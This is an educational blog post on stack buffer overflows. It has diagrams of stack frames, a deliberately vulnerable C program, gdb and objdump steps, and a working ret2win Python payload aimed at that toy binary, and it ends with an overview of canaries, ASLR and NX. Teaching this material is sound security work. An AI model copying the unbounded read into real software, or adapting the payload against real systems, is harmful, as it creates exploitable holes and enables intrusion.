Smashing the Stack: A Visual Guide to Buffer Overflows

0x4142 0x4142 9 min read #security#memory-safety#c#exploitation#ctf

How an unchecked write overwrites a saved return address, with a working ret2win demo, and why canaries, ASLR, and NX exist.

In 1996, someone writing as Aleph One published Smashing the Stack for Fun and Profit in Phrack 49. Three decades later it’s still the paper most security courses hand you first, because the bug it describes hasn’t gone away. It’s just gotten harder to pull off thanks to the mitigations we’ll get to at the end. Understanding why those mitigations exist means understanding what a function call actually does to memory, which is hard to hold in your head without a picture. So this post has a lot of pictures.

Why a decades-old bug still matters

A stack buffer overflow happens when a program writes more data into a fixed-size local buffer than that buffer can hold, and the extra bytes spill into adjacent memory instead of being rejected. In a memory-unsafe language like C or C++, nothing stops that write. The consequences range from “the program crashes” to “an attacker who controls the input now controls where the program jumps next”, which is another way of saying arbitrary code execution. It’s tracked today as CWE-121, and it’s the same root cause behind the 1988 Morris worm, decades of CVEs in C-language servers and parsers, and no small number of “critical” security advisories still being filed for embedded and legacy code.

Important (Scope of this post)

This is a conceptual walkthrough of how the bug works and why it’s dangerous: the same material any intro security course covers. Further down there’s a working demo, but it only redirects execution to a function that’s already compiled into a program you build yourself: no shellcode, no injected code, and nothing aimed at software you don’t own. Run it in a disposable VM or container, never anywhere that matters.

How memory is laid out under your program

Every running process gets its own virtual address space. The part that matters here is that the stack and the heap grow toward each other from opposite ends of that space:

Layout of a process's virtual address space A column of memory segments from high to low addresses: argv and environment, then the stack growing downward, an unmapped gap, the heap growing upward, then the BSS, data, and text segments at the bottom. higher addresses argv / envp command-line args, environment stack grows toward lower addresses ↓ unmapped gap heap grows toward higher addresses ↑ bss (uninitialized globals) data (initialized globals) text (program code)
Fig. 1: A process's address space. The stack and heap grow toward each other so both can expand without a fixed size limit.

Every time a function is called, a new stack frame is pushed onto the stack: room for its local variables, its saved bookkeeping, and the address execution should return to when it’s done. That frame is where our bug lives.

Anatomy of a stack frame

Take this function:

void vulnerable(char *input) {
char buf[64];
strcpy(buf, input); // no bounds check, copies until it hits '\0'
printf("You said: %s\n", buf);
}

When vulnerable is called, its frame looks like this (this is the classic x86 layout the original paper uses; the same idea holds on other architectures, just with different register names):

A stack frame before the overflow From high to low addresses: the caller's frame, the return address, the saved base pointer, and a 64-byte local buffer at the bottom, where the stack pointer sits. higher addresses caller's frame (arguments, …) return address saved base pointer buf[64] local buffer strcpy writes upward ↑

← stack pointer (top of stack) lower addresses

Fig. 2: buf sits at the bottom of the frame, at lower addresses than the saved base pointer and the return address above it.

The detail that makes the whole bug possible: buf occupies the lowest addresses in the frame, and strcpy writes forward, toward higher addresses. So a write that runs past the end of buf doesn’t wrap around or crash immediately. It keeps going, straight into the saved base pointer, and then into the return address sitting right above it.

What an overflow actually overwrites

Call vulnerable("AAAA...AAAA") with more than 64 'A' bytes (0x41 each), and here’s the same frame afterward:

The same stack frame after a buffer overflow The 64-byte buffer has been filled past its end with repeating 0x41 bytes, overwriting the saved base pointer and the return address, which now points to attacker-controlled memory instead of back into the caller. return address 0x41414141 saved base pointer → 0x41414141 41 41 41 41 41 41 41 41 … buf[64], fully overwritten write continues past the end ↑

← stack pointer

on return: jumps to 0x41414141 instead of the caller
Fig. 3: Every byte past the 64th overwrites the next thing in memory. Here that's the saved base pointer, then the return address itself.

In this toy example the overflow just crashes: 0x41414141 almost certainly isn’t mapped memory. But the attacker doesn’t have to send 'A' characters. They control every byte of the input, which means they control exactly what value lands in that return-address slot. The two classic choices from the original paper are:

  • Point it at injected code. Fill part of the buffer with actual machine instructions and aim the return address at them, so the CPU starts executing attacker-supplied bytes the moment the function returns.
  • Point it at code that already exists. Modern defenses make the first option hard (more below), so real-world exploits increasingly reuse existing code in the binary or its libraries instead, chaining together legitimate instructions to do something the program was never meant to do.

Either way, the core move is the same: a write bug becomes a control-flow hijack, because on this architecture the thing that decides “what runs next” and the thing holding “user data” live in the same writable memory, one right after the other.

A hands-on simulation: hijacking control flow yourself

Theory is one thing. Here’s a minimal, deliberately vulnerable program you can compile and attack yourself, plus the exact payload that does it. It redirects execution to a function that’s already compiled into the binary rather than injecting new code, which is both simpler to build and closer to how real exploits work today now that NX makes injected shellcode hard to run.

Important (Run this in a disposable VM or container you don’t care about)

This deliberately switches off protections a real toolchain enables by default. Never disable these on a machine, account, or service that matters. Compile and run this only in a throwaway VM or container, against this exact code.

The target

vuln.c
#include <stdio.h>
#include <unistd.h>
void win(void) {
puts("\n🚩 win() ran: control flow was hijacked via the return address.");
}
void vulnerable(void) {
char buf[64];
read(0, buf, 200); // reads up to 200 bytes into 64, no bounds check
printf("You said: %.64s\n", buf);
}
int main(void) {
setvbuf(stdout, NULL, _IONBF, 0); // don't lose buffered output when we crash
vulnerable();
puts("vulnerable() returned normally.");
return 0;
}

win() is never called anywhere in this program. The only way it runs is if something hijacks control flow into it, which is exactly what the payload below does.

Building it with the safety rails off

Terminal window
gcc -fno-stack-protector -no-pie -O0 -o vuln vuln.c
  • -fno-stack-protector removes the canary from Fig. 5, so the overwrite isn’t caught before it’s used.
  • -no-pie gives the binary a fixed, predictable load address, so win() lands at the same address every run. A real attack without an accompanying info leak has to defeat ASLR to get this for free.
  • NX doesn’t need to be touched: this payload never injects new code, only redirects execution to code that’s already there.

Finding the offset

Exactly how many padding bytes it takes to reach the return address depends on your compiler and its version. Don’t assume it’s simply 64 + 8. Find it for your own build with a debugger and a long, distinctive input rather than guessing:

Terminal window
gdb ./vuln
(gdb) run <<< $(python3 -c 'print("A"*100)')
# Program received signal SIGSEGV ...
(gdb) print $rsp
# use the crash address, or a cyclic/de Bruijn pattern instead of plain
# 'A's, to compute the exact offset for your build

For this post’s build, the offset came out to 72 bytes: 64 for buf plus 8 for the saved base pointer sitting right above it.

Finding win()’s address

Terminal window
objdump -d vuln | grep -A1 '<win>:'
# 0000000000401196 <win>:
# 401196: 55 push %rbp

The payload

payload.py
#!/usr/bin/env python3
import struct, sys
OFFSET = 72 # from the offset-finding step above
WIN_ADDR = 0x0000000000401196 # from `objdump -d vuln`, on your own build
payload = b"A" * OFFSET + struct.pack("<Q", WIN_ADDR)
sys.stdout.buffer.write(payload)

72 bytes of padding to fill buf and the saved base pointer, followed by win()’s address packed little-endian, the same return-address slot from Fig. 3, aimed somewhere specific instead of at 0x41414141:

The demo payload overwriting the return address with win()'s address Seventy-two bytes of padding fill the buffer and the saved base pointer, and the final eight bytes of the payload overwrite the return address with the address of the win function, so the CPU jumps there instead of back into main. return address → address of win() saved base pointer ← padding 64 bytes of 'A' padding buf[64], bytes 0-63 of the payload 8 more padding bytes reach the saved rbp

← stack pointer

win() runs instead of returning to main()
Fig. 4: The demo payload: 72 bytes of padding filling buf and the saved base pointer, followed by the 8-byte address of win(), little-endian.

Running it

Terminal window
$ ./vuln
hello
You said: hello
vulnerable() returned normally.
$ python3 payload.py | ./vuln
You said: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
🚩 win() ran: control flow was hijacked via the return address.
Segmentation fault (core dumped)

The segfault right after win() runs is expected, not a mistake in the payload: this only overwrote one return address. When win() itself tries to return, it pops whatever happens to sit above it on the stack next, and there was never a valid address planted there. That’s the whole demo: one unbounded write, 72 bytes of predictable padding, and 8 bytes of address turned “return to caller” into “run this arbitrary function instead.”

Note (What this demo deliberately doesn’t show)

No shellcode, no NOP sled, no bypassing a canary or ASLR. Those are separate, harder problems layered on top of this same core bug, which is exactly why the mitigations in the next section exist. This demo isolates the one idea worth internalizing: when a return address lives in the same writable memory as unchecked user input, whoever controls the input controls where execution goes next.

Why this is a serious risk

It doesn’t take much

The vulnerable function above is four lines long, uses a completely ordinary standard-library call, and would have compiled without a single warning on most toolchains for decades. Bugs of this shape have historically hidden in format parsers, protocol decoders, header handlers: anywhere a length is read from untrusted input and trusted a little too much.

Real-world impact

  • The Morris worm (1988), one of the first self-propagating internet worms, exploited a stack buffer overflow in fingerd.
  • Buffer overflows are consistently one of the most reported vulnerability classes in the CWE Top 25 most dangerous software weaknesses, decades after they were first documented.
  • Because they can lead directly to remote code execution, they’re routinely rated critical severity: a single unchecked copy in network-facing code can be enough to fully compromise a host.

How modern systems defend against it

The reason this specific example won’t just work if you copy-paste it today is that mainstream toolchains and OSes now stack several independent mitigations on top of each other.

Stack canaries

The compiler places a random value, the canary, between local buffers and the saved base pointer, and inserts a check right before the function returns.

A stack frame protected by a stack canary A random canary value sits between the buffer and the saved base pointer. An overflow must corrupt the canary before it can reach the return address, and the function checks the canary just before returning, aborting the program if it has changed. return address saved base pointer canary (random, checked on return) buf[64] overflow must pass through the canary first before returning…

canary unchanged → ret proceeds normally

canary corrupted → abort: stack smashing detected

Fig. 5: The canary sits between the buffer and the saved data it protects. A linear overflow has to overwrite it first, and a changed canary aborts the program before the corrupted return address is ever used.

This is why the toy example needs -fno-stack-protector to behave the way the diagrams describe: GCC and Clang have enabled canaries by default since the mid-2000s.

Address space layout randomization (ASLR)

The OS randomizes where the stack, heap, and shared libraries are loaded on every run. Even if an attacker corrupts a return address, reliably guessing where their injected code or reusable gadgets actually live in memory becomes much harder.

Non-executable stack (NX / DEP)

Memory pages holding the stack are marked non-executable at the hardware level, so even a return address that does point at injected shellcode can’t run it: the CPU refuses to execute instructions fetched from that page. This is what pushed attackers toward reusing existing executable code instead of injecting new code.

Safer languages and tooling

The most durable fix is structural rather than reactive: languages like Rust and Go make this entire bug class largely unrepresentable by enforcing bounds-checked memory access at compile time or runtime. Where C and C++ remain, fuzzing (e.g. libFuzzer, AFL) and sanitizers (AddressSanitizer) catch overflows like this one long before they ship.

Note

No single mitigation here is bulletproof on its own: canaries, ASLR, and NX are typically deployed together specifically because bypassing all three at once is a much taller order than bypassing any one of them alone.

Key takeaways

  • A stack buffer overflow happens when a write to a fixed-size local buffer isn’t bounds-checked, and the extra bytes spill into adjacent stack memory.
  • Because local buffers sit at lower addresses than the saved base pointer and return address, an overflow that writes far enough overwrites exactly the data that controls where the program executes next.
  • That’s what turns a memory-safety bug into a control-flow hijack, and potentially into remote code execution.
  • Stack canaries, ASLR, and non-executable stack pages each close off part of the attack independently; modern toolchains enable all three by default for exactly that reason.
  • The most reliable long-term fix is avoiding the bug class entirely, via memory-safe languages and rigorous fuzzing/sanitization of C/C++ code that can’t yet be replaced.

Further reading